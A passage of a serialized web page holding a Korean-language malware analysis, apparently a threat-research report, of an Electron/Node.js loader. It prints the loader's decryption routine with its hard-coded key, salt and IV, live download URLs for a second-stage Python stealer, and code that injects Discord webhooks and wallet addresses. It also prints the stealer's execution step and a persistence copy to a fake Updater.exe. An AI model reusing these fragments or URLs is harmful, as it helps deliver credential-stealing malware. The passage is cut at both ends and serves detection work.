crypto.",[1679,3004,3005],{"class":2765},"pbkdf2Sync",[1679,3007,3008],{"class":3001},"(\n",[1679,3010,3011],{"class":1681,"line":2059},[1679,3012,3013],{"class":3001},"  masterkey,\n",[1679,3015,3016,3019,3022,3025,3028],{"class":1681,"line":2065},[1679,3017,3018],{"class":3001},"  Buffer.",[1679,3020,3021],{"class":2765},"from",[1679,3023,3024],{"class":3001},"(salt, ",[1679,3026,3027],{"class":2769},"\"base64\"",[1679,3029,3030],{"class":3001},"),\n",[1679,3032,3033,3036],{"class":1681,"line":2071},[1679,3034,3035],{"class":2773},"  100000",[1679,3037,3038],{"class":3001},",\n",[1679,3040,3041,3044],{"class":1681,"line":2393},[1679,3042,3043],{"class":2773},"  32",[1679,3045,3038],{"class":3001},[1679,3047,3048,3051],{"class":1681,"line":2399},[1679,3049,3050],{"class":2769},"  \"sha512\"",[1679,3052,3038],{"class":3001},[1679,3054,3056],{"class":1681,"line":3055},7,[1679,3057,3058],{"class":3001},");\n",[603,3060,3061,3067,3073,3079],{},[606,3062,3063,3066],{},[539,3064,3065],{},"해시 함수:"," SHA-512",[606,3068,3069,3072],{},[539,3070,3071],{},"반복 횟수:"," 100,000",[606,3074,3075,3078],{},[539,3076,3077],{},"키 길이:"," 32바이트(256비트)",[606,3080,3081,3084],{},[539,3082,3083],{},"솔트:"," Base64 디코딩된 입력으로 제공됨",[606,3086,3087,3090,3091,3141,3143,3144],{},[539,3088,3089],{},"AES-256-CBC 복호화:","\n파생된 키는 이후 AES 복호화 객체를 생성하는 데 사용됩니다:",[587,3092,3094],{"className":2982,"code":3093,"language":2984,"meta":593,"style":593},"const decipher = crypto.createDecipheriv(\n  \"aes-256-cbc\",\n  key,\n  Buffer.from(iv, \"base64\"),\n);\n",[550,3095,3096,3112,3119,3124,3137],{"__ignoreMap":593},[1679,3097,3098,3100,3103,3105,3107,3110],{"class":1681,"line":1682},[1679,3099,2992],{"class":2991},[1679,3101,3102],{"class":2773}," decipher",[1679,3104,2998],{"class":2991},[1679,3106,3002],{"class":3001},[1679,3108,3109],{"class":2765},"createDecipheriv",[1679,3111,3008],{"class":3001},[1679,3113,3114,3117],{"class":1681,"line":2059},[1679,3115,3116],{"class":2769},"  \"aes-256-cbc\"",[1679,3118,3038],{"class":3001},[1679,3120,3121],{"class":1681,"line":2065},[1679,3122,3123],{"class":3001},"  key,\n",[1679,3125,3126,3128,3130,3133,3135],{"class":1681,"line":2071},[1679,3127,3018],{"class":3001},[1679,3129,3021],{"class":2765},[1679,3131,3132],{"class":3001},"(iv, ",[1679,3134,3027],{"class":2769},[1679,3136,3030],{"class":3001},[1679,3138,3139],{"class":1681,"line":2393},[1679,3140,3058],{"class":3001},[696,3142],{},"암호화된 페이로드는 표준 CBC(Cipher Block Chaining) 모드를 사용해 복호화됩니다:",[587,3145,3147],{"className":2982,"code":3146,"language":2984,"meta":593,"style":593},"let decrypted = decipher.update(encdata, \"base64\", \"utf8\");\ndecrypted += decipher.final(\"utf8\");\n",[550,3148,3149,3178],{"__ignoreMap":593},[1679,3150,3151,3154,3157,3160,3163,3166,3169,3171,3173,3176],{"class":1681,"line":1682},[1679,3152,3153],{"class":2991},"let",[1679,3155,3156],{"class":3001}," decrypted ",[1679,3158,3159],{"class":2991},"=",[1679,3161,3162],{"class":3001}," decipher.",[1679,3164,3165],{"class":2765},"update",[1679,3167,3168],{"class":3001},"(encdata, ",[1679,3170,3027],{"class":2769},[1679,3172,619],{"class":3001},[1679,3174,3175],{"class":2769},"\"utf8\"",[1679,3177,3058],{"class":3001},[1679,3179,3180,3183,3186,3188,3191,3194,3196],{"class":1681,"line":2059},[1679,3181,3182],{"class":3001},"decrypted ",[1679,3184,3185],{"class":2991},"+=",[1679,3187,3162],{"class":3001},[1679,3189,3190],{"class":2765},"final",[1679,3192,3193],{"class":3001},"(",[1679,3195,3175],{"class":2769},[1679,3197,3058],{"class":3001},[606,3199,3200,3203,3204,3207,3208,3229,3231],{},[539,3201,3202],{},"동적 실행:","\n복호화된 JavaScript 코드는 디스크에 절대 기록되지 않습니다. 대신 ",[550,3205,3206],{},"Function"," 생성자를 사용해 메모리에서 동적으로 실행됩니다:",[587,3209,3211],{"className":2982,"code":3210,"language":2984,"meta":593,"style":593},"new Function(\"require\", decrypted)(require);\n",[550,3212,3213],{"__ignoreMap":593},[1679,3214,3215,3218,3221,3223,3226],{"class":1681,"line":1682},[1679,3216,3217],{"class":2991},"new",[1679,3219,3220],{"class":2765}," Function",[1679,3222,3193],{"class":3001},[1679,3224,3225],{"class":2769},"\"require\"",[1679,3227,3228],{"class":3001},", decrypted)(require);\n",[696,3230],{},"이 기법은 파일리스 실행을 가능하게 하여, 디스크 기반 스캔에 의존하는 전통적인 안티바이러스 엔진의 탐지 가능성을 줄입니다.",[532,3233,3234],{},"이 접근은 키 파생, 강력한 암호화, 동적 메모리 내 실행을 결합함으로써 리버스 엔지니어링에 대한 계층화된 방어를 보여 줍니다.",[532,3236,3237],{},[539,3238,3239],{},"키 자료 및 암호화된 데이터",[532,3241,3242],{},"이 스크립트에는 다음과 같은 하드코딩된 입력이 포함되어 있습니다:",[603,3244,3245,3251,3260,3268],{},[606,3246,3247,3250],{},[539,3248,3249],{},"암호화된 데이터:"," 거대한 Base64 인코딩 블롭",[606,3252,3253,3256,3257],{},[539,3254,3255],{},"마스터 키:"," ",[550,3258,3259],{},"9uNXNGt8/7kN7ZiEvy1OdYNpbcnzkERs",[606,3261,3262,3256,3264,3267],{},[539,3263,3083],{},[550,3265,3266],{},"maXtklzMEZRY9dbul/XPSw==","(Base64 인코딩)",[606,3269,3270,3256,3273,3267],{},[539,3271,3272],{},"IV:",[550,3274,3275],{},"HwK6sOz7FBbL+YsrOxtYUg==",[532,3277,3278,3279,3281],{},"이들은 모두 ",[550,3280,2807],{},"의 소스 코드에 직접 삽입되어 있습니다.",[713,3283,3285],{"id":3284},"_62-복호화-후-페이로드-동작","6.2 복호화 후 페이로드 동작",[532,3287,719],{},[532,3289,3290],{},"복호화되면, 삽입된 페이로드는 다음과 같은 악성 행위를 수행하는 완전한 JavaScript 프로그램이 됩니다:",[861,3292,3294],{"id":3293},"_621-환경-준비","6.2.1 환경 준비",[532,3296,867],{},[532,3298,3299],{},"복호화된 페이로드는 내장 Node.js 모듈을 사용해 실행 환경을 설정하는 것으로 시작합니다. 이 설정 단계는 어떤 악성 동작이 발생하기 전에 필요한 모든 경로와 작업 디렉터리가 명확하게 정의되도록 보장합니다.",[603,3301,3302,3335],{},[606,3303,3304,3307,3308,3311,3312],{},[539,3305,3306],{},"임시 디렉터리 해석:","\n멀웨어는 ",[550,3309,3310],{},"os.tmpdir()","를 호출해 현재 시스템의 임시 디렉터리 경로를 확인합니다. 임시 폴더는 일반적으로 쓰기 가능하고 엔드포인트 보호 시스템의 감시를 덜 받기 때문에, 이는 멀웨어의 흔한 전술입니다.",[587,3313,3315],{"className":2982,"code":3314,"language":2984,"meta":593,"style":593},"const tempDir = os.tmpdir();\n",[550,3316,3317],{"__ignoreMap":593},[1679,3318,3319,3321,3324,3326,3329,3332],{"class":1681,"line":1682},[1679,3320,2992],{"class":2991},[1679,3322,3323],{"class":2773}," tempDir",[1679,3325,2998],{"class":2991},[1679,3327,3328],{"class":3001}," os.",[1679,3330,3331],{"class":2765},"tmpdir",[1679,3333,3334],{"class":3001},"();\n",[606,3336,3337,3340,3341,3354],{},[539,3338,3339],{},"경로 구성:","\n이후 스크립트는 두 개의 중요한 파일에 대한 절대 경로를 구성합니다:",[603,3342,3343,3348],{},[606,3344,3345,3347],{},[550,3346,2869],{},": 실제 2단계 Python 기반 스틸러를 담은 아카이브",[606,3349,3350,3353],{},[550,3351,3352],{},"bnd.exe",": 지속성 백도어나 추가 페이로드 역할을 할 수 있는 선택적 실행 파일",[587,3355,3357],{"className":2982,"code":3356,"language":2984,"meta":593,"style":593},"const tempFile = path.join(tempDir, \"pyth.zip\");\nconst binderFile = path.join(tempDir, \"bnd.exe\");\n",[550,3358,3359,3382],{"__ignoreMap":593},[1679,3360,3361,3363,3366,3368,3371,3374,3377,3380],{"class":1681,"line":1682},[1679,3362,2992],{"class":2991},[1679,3364,3365],{"class":2773}," tempFile",[1679,3367,2998],{"class":2991},[1679,3369,3370],{"class":3001}," path.",[1679,3372,3373],{"class":2765},"join",[1679,3375,3376],{"class":3001},"(tempDir, ",[1679,3378,3379],{"class":2769},"\"pyth.zip\"",[1679,3381,3058],{"class":3001},[1679,3383,3384,3386,3389,3391,3393,3395,3397,3400],{"class":1681,"line":2059},[1679,3385,2992],{"class":2991},[1679,3387,3388],{"class":2773}," binderFile",[1679,3390,2998],{"class":2991},[1679,3392,3370],{"class":3001},[1679,3394,3373],{"class":2765},[1679,3396,3376],{"class":3001},[1679,3398,3399],{"class":2769},"\"bnd.exe\"",[1679,3401,3058],{"class":3001},[532,3403,3404],{},"이 경로 설정은 OS별 경로 구문을 추상화하여 멀웨어가 모든 Windows 시스템에서 원활하게 작동할 수 있게 합니다. 또한 뒤이어 나오는 파일 다운로드 및 압축 해제 메커니즘의 기반을 마련합니다.",[861,3406,3408],{"id":3407},"_622-대체-전략을-갖춘-페이로드-다운로드","6.2.2 대체 전략을 갖춘 페이로드 다운로드",[532,3410,867],{},[532,3412,3413],{},"복호화된 JavaScript 페이로드의 두 번째 주요 단계는 원격 소스에서 악성 ZIP 아카이브를 다운로드하는 것을 포함합니다. 이 메커니즘은 복원력과 가용성을 높이기 위해 다층 대체 전략으로 설계되었습니다.",[603,3415,3416,3447,3532,3566],{},[606,3417,3418,3421,3422,3442,1734,3444,3446],{},[539,3419,3420],{},"Rentry.co를 통한 기본 링크 해석","\n스크립트는 텍스트 붙여넣기 서비스에서 동적 URL을 해석하는 것으로 시작합니다. 다음으로 GET 요청을 보냅니다:",[587,3423,3425],{"className":2982,"code":3424,"language":2984,"meta":593,"style":593},"const url = \"https://rentry.co/7vzd22fg36hfdd33/raw\";\n",[550,3426,3427],{"__ignoreMap":593},[1679,3428,3429,3431,3434,3436,3439],{"class":1681,"line":1682},[1679,3430,2992],{"class":2991},[1679,3432,3433],{"class":2773}," url",[1679,3435,2998],{"class":2991},[1679,3437,3438],{"class":2769}," \"https://rentry.co/7vzd22fg36hfdd33/raw\"",[1679,3440,3441],{"class":3001},";\n",[696,3443],{},[550,3445,2869],{}," 아카이브의 실제 위치를 가리키는 평문 URL 문자열을 반환합니다. 이와 같은 리디렉션 메커니즘을 사용하는 것은 흔한 난독화 기법입니다. 실제 악성 URL을 추상화하여 정적 탐지를 더 어렵게 만듭니다.",[606,3448,3449,3452,3453,3485,3487,3488,3490,3491,3525,3527,3528,3531],{},[539,3450,3451],{},"다운로드 실행","\n해석된 URL은 이후 응답 스트림과 함께 Axios 라이브러리를 사용해 요청됩니다:",[587,3454,3456],{"className":2982,"code":3455,"language":2984,"meta":593,"style":593},"const fileResponse = await axios.get(fileUrl, { responseType: \"stream\" });\n",[550,3457,3458],{"__ignoreMap":593},[1679,3459,3460,3462,3465,3467,3470,3473,3476,3479,3482],{"class":1681,"line":1682},[1679,3461,2992],{"class":2991},[1679,3463,3464],{"class":2773}," fileResponse",[1679,3466,2998],{"class":2991},[1679,3468,3469],{"class":2991}," await",[1679,3471,3472],{"class":3001}," axios.",[1679,3474,3475],{"class":2765},"get",[1679,3477,3478],{"class":3001},"(fileUrl, { responseType: ",[1679,3480,3481],{"class":2769},"\"stream\"",[1679,3483,3484],{"class":3001}," });\n",[696,3486],{},"파일은 시스템의 임시 디렉터리에 ",[550,3489,2869],{},"으로 디스크에 기록됩니다:",[587,3492,3494],{"className":2982,"code":3493,"language":2984,"meta":593,"style":593},"const writer = fs.createWriteStream(tempFile);\nfileResponse.data.pipe(writer);\n",[550,3495,3496,3514],{"__ignoreMap":593},[1679,3497,3498,3500,3503,3505,3508,3511],{"class":1681,"line":1682},[1679,3499,2992],{"class":2991},[1679,3501,3502],{"class":2773}," writer",[1679,3504,2998],{"class":2991},[1679,3506,3507],{"class":3001}," fs.",[1679,3509,3510],{"class":2765},"createWriteStream",[1679,3512,3513],{"class":3001},"(tempFile);\n",[1679,3515,3516,3519,3522],{"class":1681,"line":2059},[1679,3517,3518],{"class":3001},"fileResponse.data.",[1679,3520,3521],{"class":2765},"pipe",[1679,3523,3524],{"class":3001},"(writer);\n",[696,3526],{},"이 다운로드는 이후 로직이 실행되기 전에 동기적 완료를 보장하기 위해 ",[550,3529,3530],{},"Promise","로 감싸집니다.",[606,3533,3534,3537,3538,3563,3565],{},[539,3535,3536],{},"대체 URL","\nRentry 기반 링크가 실패하면, 스크립트는 하드코딩된 백업 위치를 시도합니다:",[587,3539,3541],{"className":2982,"code":3540,"language":2984,"meta":593,"style":593},"https://cosmicdust.zip/.well-known/pki-validation/pyth.zip\nhttps://cosmoplanets.net/well-known/pki-validation/pyth.zip\n",[550,3542,3543,3554],{"__ignoreMap":593},[1679,3544,3545,3548,3550],{"class":1681,"line":1682},[1679,3546,3547],{"class":2765},"https",[1679,3549,1174],{"class":3001},[1679,3551,3553],{"class":3552},"sJ8bj","//cosmicdust.zip/.well-known/pki-validation/pyth.zip\n",[1679,3555,3556,3558,3560],{"class":1681,"line":2059},[1679,3557,3547],{"class":2765},[1679,3559,1174],{"class":3001},[1679,3561,3562],{"class":3552},"//cosmoplanets.net/well-known/pki-validation/pyth.zip\n",[696,3564],{},"이 도메인들은 표준 TLS 검증 폴더의 일부처럼 보이도록 구성되어 있으며, 의심을 줄이기 위해 Let's Encrypt나 도메인 검증 경로를 모방했을 가능성이 있습니다. 각 대체는 동일한 스트리밍 및 파일 쓰기 로직으로 재시도됩니다.",[606,3567,3568,3571,3572,3575],{},[539,3569,3570],{},"견고성 및 난독화","\n이 대체 메커니즘은 멀웨어가 2단계 페이로드에 대해 여러 회수 경로를 갖도록 보장합니다. 동적 포인터(",[550,3573,3574],{},"rentry.co",")와 여러 장애 조치 미러의 사용은 멀웨어를 테이크다운, 차단, DNS 싱크홀에 더 강하게 만듭니다.",[532,3577,3578],{},"이 단계는 계층화된 이중화와 잘 위장된 전달 인프라를 사용하는, 멀웨어 제작자의 치밀한 운영 계획을 잘 보여 줍니다.",[603,3580,3581,3587],{},[606,3582,3583,3584,3586],{},"해석된 URL에서 ",[550,3585,2869],{},"을 다운로드합니다",[606,3588,3589,3590],{},"실패하면 대체 미러를 시도합니다:\n",[603,3591,3592,3597],{},[606,3593,3594],{},[550,3595,3596],{},"https://cosmicdust.zip/.well-known/pki-validation/pyth.zip",[606,3598,3599],{},[550,3600,3601],{},"https://cosmoplanets.net/well-known/pki-validation/pyth.zip",[861,3603,3605],{"id":3604},"_623-페이로드-추출-및-조작","6.2.3 페이로드 추출 및 조작",[532,3607,867],{},[532,3609,3610,3612,3613,3615],{},[550,3611,2869],{}," 아카이브가 성공적으로 다운로드되어 디스크에 저장되면, 멀웨어는 그 내용을 추출하고 실행을 위해 준비하는 작업으로 진행합니다. 이는 ZIP 파일을 프로그래밍 방식으로 처리할 수 있게 하는 ",[550,3614,2839],{}," Node.js 라이브러리를 사용해 이루어집니다.",[603,3617,3618,3666,3691],{},[606,3619,3620,3623,3660,3662,3663,3665],{},[539,3621,3622],{},"ZIP 추출:",[587,3624,3626],{"className":2982,"code":3625,"language":2984,"meta":593,"style":593},"const zip = new AdmZip(tempFile);\nzip.extractAllTo(tempDir, true);\n",[550,3627,3628,3645],{"__ignoreMap":593},[1679,3629,3630,3632,3635,3637,3640,3643],{"class":1681,"line":1682},[1679,3631,2992],{"class":2991},[1679,3633,3634],{"class":2773}," zip",[1679,3636,2998],{"class":2991},[1679,3638,3639],{"class":2991}," new",[1679,3641,3642],{"class":2765}," AdmZip",[1679,3644,3513],{"class":3001},[1679,3646,3647,3650,3653,3655,3658],{"class":1681,"line":2059},[1679,3648,3649],{"class":3001},"zip.",[1679,3651,3652],{"class":2765},"extractAllTo",[1679,3654,3376],{"class":3001},[1679,3656,3657],{"class":2773},"true",[1679,3659,3058],{"class":3001},[696,3661],{},"이는 아카이브의 모든 내용을 시스템의 임시 디렉터리로 추출합니다. ",[550,3664,3657],{}," 플래그는 기존 파일의 덮어쓰기를 보장합니다.",[606,3667,3668,3671,3673,3674],{},[539,3669,3670],{},"아카이브 내용:",[550,3672,2869],{}," 아카이브에는 완전히 번들된 Python 프로젝트가 포함되어 있으며, 다음을 포함합니다:",[603,3675,3676,3679,3682],{},[606,3677,3678],{},"정상 Python 패키지와 유사한 디렉터리 구조",[606,3680,3681],{},"여러 Python 모듈 및 의존성",[606,3683,3684,3687,3688,3690],{},[550,3685,3686],{},"Crypto/Util/astor.py","에 위치한 핵심 파일 ",[550,3689,584],{},". 주된 스틸러 페이로드입니다",[606,3692,3693,3307,3696,3698,3699,3719],{},[539,3694,3695],{},"플레이스홀더 치환:",[550,3697,584],{}," 내의 사전 정의된 플레이스홀더를 동적으로 치환하여 다음과 같은 공격자 제어 구성 데이터를 주입합니다:",[603,3700,3701,3704,3707,3713],{},[606,3702,3703],{},"Discord 웹훅 URL",[606,3705,3706],{},"암호화폐 지갑 주소(BTC, ETH, DOGE, LTC, XMR 등)",[606,3708,3709,3710,2013],{},"사용자 식별자(",[550,3711,3712],{},"%USERID%",[606,3714,3715,3716,2013],{},"오류 상태 플래그(",[550,3717,3718],{},"%ERRORSTATUS%",[587,3720,3722],{"className":2982,"code":3721,"language":2984,"meta":593,"style":593},"fs.readFile(extractedDir + \"\\Crypto\\Util\\astor.py\", 'utf8', (err, data) => {\n  let updatedFile = data\n    .replace(\"%DISCORD%\", \u003Cwebhook>)\n    .replace(\"%ADDRESSBTC%\", \u003Cbtc_address>)\n    ...\n    .replace(\"%ERRORSTATUS%\", displayError ? \"true\" : \"false\");\n\n  fs.writeFile(extractedDir + \"\\Crypto\\Util\\astor.py\", updatedFile, 'utf8');\n});\n",[550,3723,3724,3785,3798,3821,3831,3836,3841,3846,3852],{"__ignoreMap":593},[1679,3725,3726,3729,3732,3735,3738,3741,3744,3747,3750,3753,3756,3759,3761,3764,3767,3771,3773,3776,3779,3782],{"class":1681,"line":1682},[1679,3727,3728],{"class":3001},"fs.",[1679,3730,3731],{"class":2765},"readFile",[1679,3733,3734],{"class":3001},"(extractedDir ",[1679,3736,3737],{"class":2991},"+",[1679,3739,3740],{"class":2769}," \"",[1679,3742,3743],{"class":2773},"\\C",[1679,3745,3746],{"class":2769},"rypto",[1679,3748,3749],{"class":2773},"\\U",[1679,3751,3752],{"class":2769},"til",[1679,3754,3755],{"class":2773},"\\a",[1679,3757,3758],{"class":2769},"stor.py\"",[1679,3760,619],{"class":3001},[1679,3762,3763],{"class":2769},"'utf8'",[1679,3765,3766],{"class":3001},", (",[1679,3768,3770],{"class":3769},"s4XuR","err",[1679,3772,619],{"class":3001},[1679,3774,3775],{"class":3769},"data",[1679,3777,3778],{"class":3001},") ",[1679,3780,3781],{"class":2991},"=>",[1679,3783,3784],{"class":3001}," {\n",[1679,3786,3787,3790,3793,3795],{"class":1681,"line":2059},[1679,3788,3789],{"class":2991},"  let",[1679,3791,3792],{"class":3001}," updatedFile ",[1679,3794,3159],{"class":2991},[1679,3796,3797],{"class":3001}," data\n",[1679,3799,3800,3803,3806,3808,3811,3814,3818],{"class":1681,"line":2065},[1679,3801,3802],{"class":3001},"    .",[1679,3804,3805],{"class":2765},"replace",[1679,3807,3193],{"class":3001},[1679,3809,3810],{"class":2769},"\"%DISCORD%\"",[1679,3812,3813],{"class":3001},", \u003C",[1679,3815,3817],{"class":3816},"s9eBZ","webhook",[1679,3819,3820],{"class":3001},">)\n",[1679,3822,3823,3826,3829],{"class":1681,"line":2071},[1679,3824,3825],{"class":3001},"    .replace(\"%ADDRESSBTC%\", \u003C",[1679,3827,3828],{"class":2773},"btc_address",[1679,3830,3820],{"class":3001},[1679,3832,3833],{"class":1681,"line":2393},[1679,3834,3835],{"class":3001},"    ...\n",[1679,3837,3838],{"class":1681,"line":2399},[1679,3839,3840],{"class":3001},"    .replace(\"%ERRORSTATUS%\", displayError ? \"true\" : \"false\");\n",[1679,3842,3843],{"class":1681,"line":3055},[1679,3844,3845],{"emptyLinePlaceholder":325},"\n",[1679,3847,3849],{"class":1681,"line":3848},8,[1679,3850,3851],{"class":3001},"  fs.writeFile(extractedDir + \"\\Crypto\\Util\\astor.py\", updatedFile, 'utf8');\n",[1679,3853,3855],{"class":1681,"line":3854},9,[1679,3856,3857],{"class":3001},"});\n",[532,3859,3860],{},"이 동적 조작 단계는 필수적입니다. 공격자 제어 값의 삽입을 런타임까지 지연함으로써, 페이로드는 정적 탐지를 회피하고 운영자가 아카이브를 재패키징하지 않고도 표적과 유출 엔드포인트를 조정할 수 있게 합니다.",[603,3862,3863],{},[606,3864,3865,3867,3868],{},[550,3866,584],{},"의 플레이스홀더 문자열을 치환합니다:\n",[603,3869,3870,3876,3886],{},[606,3871,3872,3873],{},"Discord 웹훅: ",[550,3874,3875],{},"%DISCORD%",[606,3877,3878,3879,619,3882,3885],{},"지갑 주소: ",[550,3880,3881],{},"%ADDRESSBTC%",[550,3883,3884],{},"%ADDRESSETH%"," 등",[606,3887,3888],{},"사용자 ID 및 오류 플래그",[861,3890,3892],{"id":3891},"_624-멀웨어-실행","6.2.4 멀웨어 실행",[532,3894,867],{},[603,3896,3897],{},[606,3898,3899,3900],{},"astor.py로의 플레이스홀더 주입이 완료되면, 멀웨어는 시스템 호출을 통해 스틸러 실행을 개시합니다",[587,3901,3903],{"className":2982,"code":3902,"language":2984,"meta":593,"style":593},"exec(\"python.exe Crypto\\\\Util\\\\astor.py\");\n",[550,3904,3905],{"__ignoreMap":593},[1679,3906,3907,3910,3912,3915,3918,3921,3923,3926],{"class":1681,"line":1682},[1679,3908,3909],{"class":2765},"exec",[1679,3911,3193],{"class":3001},[1679,3913,3914],{"class":2769},"\"python.exe Crypto",[1679,3916,3917],{"class":2773},"\\\\",[1679,3919,3920],{"class":2769},"Util",[1679,3922,3917],{"class":2773},[1679,3924,3925],{"class":2769},"astor.py\"",[1679,3927,3058],{"class":3001},[532,3929,3930,3931,3933],{},"이 명령은 Node.js의 child_process.exec 함수를 사용해 실행되며, 삽입된 Python 페이로드를 별도의 프로세스에서 실행합니다. 이 특정 실행 패턴, 즉 ",[550,3932,1112],{}," 인수와 함께 실행되는 python.exe는 Microsoft Defender for Endpoint가 수집한 텔레메트리 데이터에서 관찰되었으며, 신뢰할 수 있는 탐지 아티팩트가 됩니다. 실제로 실행 체인은 다음과 같이 보입니다:",[532,3935,3936],{},"Microsoft Defender for Endpoint 텔레메트리에서 관찰된 전체 멀웨어 실행 체인은 다음 순서를 따릅니다:",[603,3938,3939,3948,3955,3962],{},[606,3940,3941,3943,3944,3947],{},[550,3942,577],{},"(Electron 기반 컨테이너)가 ",[550,3945,3946],{},"node.exe","를 호출합니다",[606,3949,3950,1265,3952,3954],{},[550,3951,3946],{},[550,3953,1102],{},"를 실행합니다",[606,3956,3957,1265,3959,3961],{},[550,3958,1102],{},[550,3960,552],{},"를 시작합니다",[606,3963,3964,1265,3966,3968],{},[550,3965,552],{},[550,3967,1112],{}," 파일을 실행합니다",[861,3970,3972],{"id":3971},"_625-지속성-강화","6.2.5 지속성 강화",[532,3974,867],{},[532,3976,3977,3978,3980],{},"감염된 시스템에서 장기적인 존재를 보장하기 위해, 복호화된 JavaScript 페이로드에는 최초 바이너리(",[550,3979,573],{},")를 사용자 프로필 내 숨겨진 위치로 복사하여 지속성을 재확립하는 로직이 포함되어 있습니다.",[532,3982,3983],{},[539,3984,3985],{},"대상 디렉터리",[532,3987,3988],{},"이 파일은 정상 Windows 구성 요소를 모방하는 디렉터리로 복사됩니다:",[587,3990,3992],{"className":2982,"code":3991,"language":2984,"meta":593,"style":593},"%APPDATA%\\Microsoft\\Internet Explorer\\UserData\\Updater.exe\n",[550,3993,3994],{"__ignoreMap":593},[1679,3995,3996,3999,4002,4004],{"class":1681,"line":1682},[1679,3997,3998],{"class":2991},"%",[1679,4000,4001],{"class":2773},"APPDATA",[1679,4003,3998],{"class":2991},[1679,4005,4006],{"class":3001},"\\Microsoft\\Internet Explorer\\UserData\\Updater.exe\n",[532,4008,4009],{},"이 위치는 의도적으로 선택되었습니다:",[603,4011,4012,4015],{},[606,4013,4014],{},"%APPDATA%는 일반 사용자가 쓰기 가능하며 관리자 권한이 필요하지 않습니다.",[606,4016,4017],{},"디렉터리 이름이 정상 Microsoft 애플리케이션 폴더를 모방하여 덜 의심스럽게 만듭니다.",[532,4019,4020],{},[539,4021,4022],{},"복사 메커니즘:",[532,4024,4025],{},"복사 작업은 Node.js의 fs.copyFileSync() 함수를 사용합니다:",[587,4027,4029],{"className":2982,"code":4028,"language":2984,"meta":593,"style":593},"fs.copyFileSync(\n  process.env.PORTABLE_EXECUTABLE_FILE,\n  path.join(\n    process.env.APPDATA,\n    \"Microsoft\",\n    \"Internet Explorer\",\n    \"UserData\",\n    \"Updater.exe\",\n  ),\n);\n",[550,4030,4031,4040,4050,4059,4068,4075,4082,4089,4096,4101],{"__ignoreMap":593},[1679,4032,4033,4035,4038],{"class":1681,"line":1682},[1679,4034,3728],{"class":3001},[1679,4036,4037],{"class":2765},"copyFileSync",[1679,4039,3008],{"class":3001},[1679,4041,4042,4045,4048],{"class":1681,"line":2059},[1679,4043,4044],{"class":3001},"  process.env.",[1679,4046,4047],{"class":2773},"PORTABLE_EXECUTABLE_FILE",[1679,4049,3038],{"class":3001},[1679,4051,4052,4055,4057],{"class":1681,"line":2065},[1679,4053,4054],{"class":3001},"  path.",[1679,4056,3373],{"class":2765},[1679,4058,3008],{"class":3001},[1679,4060,4061,4064,4066],{"class":1681,"line":2071},[1679,4062,4063],{"class":3001},"    process.env.",[1679,4065,4001],{"class":2773},[1679,4067,3038],{"class":3001},[1679,4069,4070,4073],{"class":1681,"line":2393},[1679,4071,4072],{"class":2769},"    \"Microsoft\"",[1679,4074,3038],{"class":3001},[1679,4076,4077,4080],{"class":1681,"line":2399},[1679,4078,4079],{"class":2769},"    \"Internet Explorer\"",[1679,4081,3038],{"class":3001},[1679,4083,4084,4087],{"class":1681,"line":3055},[1679,4085,4086],{"class":2769},"    \"UserData\"",[1679,4088,3038],{"class":3001},[1679,4090,4091,4094],{"class":1681,"line":3848},[1679,4092,4093],{"class":2769},"    \"Updater.exe\"",[1679,4095,3038],{"class":3001},[1679,4097,4098],{"class":1681,"line":3854},[1679,4099,4100],{"class":3001},"  ),\n",[1679,4102,4104],{"class":1681,"line":4103},10,[1679,4105,3058],{"class":3001},[603,4107,4108,4111],{},[606,4109,4110],{},"PORTABLE_EXECUTABLE_FILE은 많은 패커(예: Electron)가 실행 중인 바이너리의 경로를 참조하기 위해 자동으로 설정하는 환경 변수입니다.",[606,4112,4113],{},"path.join(...)은 서로 다른 운영 체제 전반에서 완전히 정규화된 대상 경로를 구성합니다.",[532,4115,4116],{},"이 로직은 파일이 아직 존재하지 않는 경우에만 실행되며, 따라서 드로퍼가 삭제되면 이를 복원하는 자가 복구 메커니즘 역할을 합니다.",[532,4118,4119,4122],{},[539,4120,4121],{},"멀웨어 체인에서의 역할","\n이 복사된 Updater.exe의 존재는 다음을 보장합니다:",[603,4124,4125,4128],{},[606,4126,4127],{},"로더가 시스템 재부팅 전반에 걸쳐 스스로를 재트리거할 수 있습니다.",[606,4129,4130],{},"전체 감염 체인(main.exe, node.exe, 궁극적으로 astor.py로 이어지는)이 더 모니터링되기 쉬운 전통적인 레지스트리 지속성 메커니즘에 의존하지 않고도 재개시될 수 있습니다.",[861,4132,4134],{"id":4133},"_626-선택적-바인더-실행","6.2.6 선택적 바인더 실행",[532,4136,867],{},[532,4138,4139,4140,4142],{},"주된 스틸러 페이로드(",[550,4141,584],{},")의 다운로드 및 실행 외에도, 복호화된 JavaScript에는 \"바인더\"라고 불리는 보조 실행 파일을 선택적으로 다운로드하고 실행하는 로직도 포함되어 있습니다. 이 구성 요소는 지속성, 시선 분산, 또는 추가 멀웨어 모듈의 배포에 사용될 수 있습니다.",[532,4144,4145],{},[539,4146,4147],{},"조건부 실행",[532,4149,4150],{},"바인더 로직은 특정 플래그가 설정된 경우에만 활성화됩니다:",[587,4152,4154],{"className":2982,"code":4153,"language":2984,"meta":593,"style":593},"enableBinder = true;\n",[550,4155,4156],{"__ignoreMap":593},[1679,4157,4158,4161,4163,4166],{"class":1681,"line":1682},[1679,4159,4160],{"class":3001},"enableBinder ",[1679,4162,3159],{"class":2991},[1679,4164,4165],{"class":2773}," true",[1679,4167,3441],{"class":3001},[532,4169,4170,4171,4174],{},"분석한 샘플에서 이 값은 기본적으로 ",[550,4172,4173],{},"false","로 설정되어 있었지만, 그 로직은 페이로드에 삽입된 채로 남아 있으며 다른 캠페인이나 변종에서 손쉽게 활성화될 수 있습니다.",[532,4176,4177],{},[539,4178,4179],{},"바인더 다운로드 로직",[532,4181,4182,4183,4186],{},"활성화되면, 스크립트는 ",[550,4184,4185],{},"%BINDERURL%"," 플레이스홀더로 정의된 URL에서 외부 바이너리를 가져오려고 시도합니다:",[587,4188,4190],{"className":2982,"code":4189,"language":2984,"meta":593,"style":593},"const fileUrl = \"%BINDERURL%\";\nconst fileResponse = await axios.get(fileUrl, { responseType: \"stream\" });\nconst writer = fs.createWriteStream(binderFile);\nfileResponse.data.pipe(writer);\n",[550,4191,4192,4206,4226,4241],{"__ignoreMap":593},[1679,4193,4194,4196,4199,4201,4204],{"class":1681,"line":1682},[1679,4195,2992],{"class":2991},[1679,4197,4198],{"class":2773}," fileUrl",[1679,4200,2998],{"class":2991},[1679,4202,4203],{"class":2769}," 